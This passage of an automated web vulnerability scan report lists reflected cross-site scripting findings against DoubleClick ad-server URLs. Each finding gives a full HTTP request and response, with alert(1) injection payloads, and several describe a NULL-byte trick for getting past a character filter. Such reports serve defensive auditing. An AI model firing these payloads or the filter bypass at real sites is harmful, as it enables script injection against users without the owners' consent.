<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.accelerator-media.com/imp?7ddff"-alert(1)-"a65d95cec7c=1&IASH=STAND&Z=120x60&s=17223&_salt=4179874164";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_da
...[SNIP]...

2.39. http://ad.doubleclick.net/adi/N4189.MSN/B5731231.17 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4189.MSN/B5731231.17

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecb22"-alert(1)-"76c61c26f6c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4189.MSN/B5731231.17;sz=300x250;ord=126916532?click=http://clk.atdmt.com/goiframe/206255252.229430379/115855006/direct/01%3fhref=ecb22"-alert(1)-"76c61c26f6c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=2066221226
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5615
Date: Wed, 03 Aug 2011 12:57:45 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jul 26 12:21:49 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
.net/click%3Bh%3Dv8/3b58/7/69/%2a/j%3B244100576%3B0-0%3B0%3B67832026%3B4307-300/250%3B43264277/43282064/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/206255252.229430379/115855006/direct/01%3fhref=ecb22"-alert(1)-"76c61c26f6chttp://www.rac.co.uk/uk-breakdown/?TrafficSource=Display");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWind
...[SNIP]...

2.40. http://ad.doubleclick.net/adi/N4189.MSN/B5731231.62 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4189.MSN/B5731231.62

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %005bd38"-alert(1)-"5de68b6a66b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bd38"-alert(1)-"5de68b6a66b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N4189.MSN/B5731231.62;sz=300x250;ord=143537574?click=http://clk.atdmt.com/goiframe/206255273.229430382/115052958/direct/01%3fhref=&%005bd38"-alert(1)-"5de68b6a66b=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/115052958/direct/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5665
Date: Wed, 03 Aug 2011 13:10:27 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jul 26 12:25:00 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/click%3Bh%3Dv8/3b58/f/6f/%2a/e%3B244100576%3B1-0%3B0%3B67832983%3B4307-300/250%3B43264356/43282143/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/206255273.229430382/115052958/direct/01%3fhref=&%005bd38"-alert(1)-"5de68b6a66b=1http%3a%2f%2fwww.rac.co.uk/uk-breakdown/%3FTrafficSource%3DDisplay");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";


...[SNIP]...

2.41. http://ad.doubleclick.net/adi/N4189.MSN/B5731231.62 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4189.MSN/B5731231.62

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f8c2"-alert(1)-"b666318228d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4189.MSN/B5731231.62;sz=300x250;ord=143537574?click=http://clk.atdmt.com/goiframe/206255273.229430382/115052958/direct/01%3fhref=5f8c2"-alert(1)-"b666318228d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/115052958/direct/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5611
Date: Wed, 03 Aug 2011 13:10:09 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jul 26 12:25:00 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
.net/click%3Bh%3Dv8/3b58/7/69/%2a/e%3B244100576%3B1-0%3B0%3B67832983%3B4307-300/250%3B43264356/43282143/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/206255273.229430382/115052958/direct/01%3fhref=5f8c2"-alert(1)-"b666318228dhttp://www.rac.co.uk/uk-breakdown/?TrafficSource=Display");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWind
...[SNIP]...

2.42. http://ad.doubleclick.net/adi/N4189.MSN/B5731231.66 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4189.MSN/B5731231.66

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %007a266"-alert(1)-"5b4df72a6fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a266"-alert(1)-"5b4df72a6fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N4189.MSN/B5731231.66;sz=300x250;ord=194019199?click=http://clk.atdmt.com/goiframe/206255252.229430384/115855006/direct/01%3fhref=&%007a266"-alert(1)-"5b4df72a6fb=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=688605955
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5669
Date: Wed, 03 Aug 2011 13:13:10 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jul 26 12:21:49 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/click%3Bh%3Dv8/3b58/f/6f/%2a/n%3B244100576%3B0-0%3B0%3B67833030%3B4307-300/250%3B43264277/43282064/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/206255252.229430384/115855006/direct/01%3fhref=&%007a266"-alert(1)-"5b4df72a6fb=1http%3a%2f%2fwww.rac.co.uk/uk-breakdown/%3FTrafficSource%3DDisplay");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";


...[SNIP]...

2.43. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.19 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.19

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 676eb'-alert(1)-'004be3e51c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4892.160904.MMNUK/B5353379.19;sz=300x250;ord=189659032?click=http://clk.atdmt.com/goiframe/205041935.207120494/msnkxmbu0010002154mbu/direct/01?href=&676eb'-alert(1)-'004be3e51c5=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38238
Date: Wed, 03 Aug 2011 12:39:27 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3Bh%3Dv8/3b58/f/76/%2a/r%3B238465577%3B2-0%3B0%3B61788907%3B4307-300/250%3B42612134/42629921/2%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/205041935.207120494/msnkxmbu0010002154mbu/direct/01?href=&676eb'-alert(1)-'004be3e51c5=1http://t.mookie1.com/t/v1/clk?migAgencyId=318&migSource=adsrv2&migTrackDataExt=2986074;61788907;238465577;42612134&migRandom=8244192&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.sky.c
...[SNIP]...

2.44. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.19 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.19

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a94c2"-alert(1)-"0cfdce15f52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4892.160904.MMNUK/B5353379.19;sz=300x250;ord=189659032?click=http://clk.atdmt.com/goiframe/205041935.207120494/msnkxmbu0010002154mbu/direct/01?href=&a94c2"-alert(1)-"0cfdce15f52=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38276
Date: Wed, 03 Aug 2011 12:39:22 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3Bh%3Dv8/3b58/f/76/%2a/c%3B238465577%3B1-0%3B0%3B61788907%3B4307-300/250%3B41771107/41788894/2%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/205041935.207120494/msnkxmbu0010002154mbu/direct/01?href=&a94c2"-alert(1)-"0cfdce15f52=1";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_1311850360923.uniqueId;
this.thirdPartyImpUrl = "http://t.mookie1.com/t
...[SNIP]...

2.45. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.19 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.19

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb861'-alert(1)-'8ddfc3d33b8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4892.160904.MMNUK/B5353379.19;sz=300x250;ord=189659032?click=http://clk.atdmt.com/goiframe/205041935.207120494/msnkxmbu0010002154mbu/direct/01?href=cb861'-alert(1)-'8ddfc3d33b8 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38261
Date: Wed, 03 Aug 2011 12:39:05 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3Bh%3Dv8/3b58/7/73/%2a/e%3B238465577%3B0-0%3B0%3B61788907%3B4307-300/250%3B41769998/41787785/2%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/205041935.207120494/msnkxmbu0010002154mbu/direct/01?href=cb861'-alert(1)-'8ddfc3d33b8http://t.mookie1.com/t/v1/clk?migAgencyId=318&migSource=adsrv2&migTrackDataExt=2986074;61788907;238465577;41769998&migRandom=8222521&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.sky.com
...[SNIP]...

2.46. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.19 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.19

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95664"-alert(1)-"db0e79d9468 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4892.160904.MMNUK/B5353379.19;sz=300x250;ord=189659032?click=http://clk.atdmt.com/goiframe/205041935.207120494/msnkxmbu0010002154mbu/direct/01?href=95664"-alert(1)-"db0e79d9468 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38261
Date: Wed, 03 Aug 2011 12:39:01 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3Bh%3Dv8/3b58/7/73/%2a/e%3B238465577%3B0-0%3B0%3B61788907%3B4307-300/250%3B41769998/41787785/2%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/205041935.207120494/msnkxmbu0010002154mbu/direct/01?href=95664"-alert(1)-"db0e79d9468";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_1311850343477.uniqueId;
this.thirdPartyImpUrl = "http://t.mookie1.com/t/v
...[SNIP]...

2.47. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.24 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.24

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd92d'-alert(1)-'0d4ae12be94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4892.160904.MMNUK/B5353379.24;sz=300x250;ord=193821233?click=http://clk.atdmt.com/goiframe/194453632.207120270/115052962/direct/01?href=&fd92d'-alert(1)-'0d4ae12be94=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9ETH&cb=1779452864
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38274
Date: Wed, 03 Aug 2011 13:10:23 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
k.net/click%3Bh%3Dv8/3b58/f/6a/%2a/l%3B238465577%3B3-0%3B0%3B61789044%3B4307-300/250%3B42697360/42715147/3%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/194453632.207120270/115052962/direct/01?href=&fd92d'-alert(1)-'0d4ae12be94=1http://t.mookie1.com/t/v1/clk?migAgencyId=318&migSource=adsrv2&migTrackDataExt=2986074;61789044;238465577;42697360&migRandom=1711178&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.sky.c
...[SNIP]...

2.48. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.24 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.24

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a014"-alert(1)-"2fe659fab9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4892.160904.MMNUK/B5353379.24;sz=300x250;ord=193821233?click=http://clk.atdmt.com/goiframe/194453632.207120270/115052962/direct/01?href=&4a014"-alert(1)-"2fe659fab9b=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9ETH&cb=1779452864
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38223
Date: Wed, 03 Aug 2011 13:10:18 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
.net/click%3Bh%3Dv8/3b58/f/6a/%2a/h%3B238465577%3B13-0%3B0%3B61789044%3B4307-300/250%3B43361008/43378795/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/194453632.207120270/115052962/direct/01?href=&4a014"-alert(1)-"2fe659fab9b=1";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_1312198495131.uniqueId;
this.thirdPartyImpUrl = "http://t.mookie1.com/t
...[SNIP]...

2.49. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.24 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.24

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7729"-alert(1)-"2987a5da095 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4892.160904.MMNUK/B5353379.24;sz=300x250;ord=193821233?click=http://clk.atdmt.com/goiframe/194453632.207120270/115052962/direct/01?href=d7729"-alert(1)-"2987a5da095 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9ETH&cb=1779452864
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38193
Date: Wed, 03 Aug 2011 13:10:02 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
ck.net/click%3Bh%3Dv8/3b58/7/67/%2a/q%3B238465577%3B2-0%3B0%3B61789044%3B4307-300/250%3B42612134/42629921/2%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/194453632.207120270/115052962/direct/01?href=d7729"-alert(1)-"2987a5da095";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_1311850701134.uniqueId;
this.thirdPartyImpUrl = "http://t.mookie1.com/t/v
...[SNIP]...

2.50. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.50 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.50

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82770"-alert(1)-"08e18e3c776 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4892.160904.MMNUK/B5353379.50;sz=300x250;ord=167811409?click=http://clk.atdmt.com/goiframe/194453605.221128427/115052958/direct/01%3fhref=&82770"-alert(1)-"08e18e3c776=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9EVH&cb=152584448
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6849
Date: Wed, 03 Aug 2011 12:38:25 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
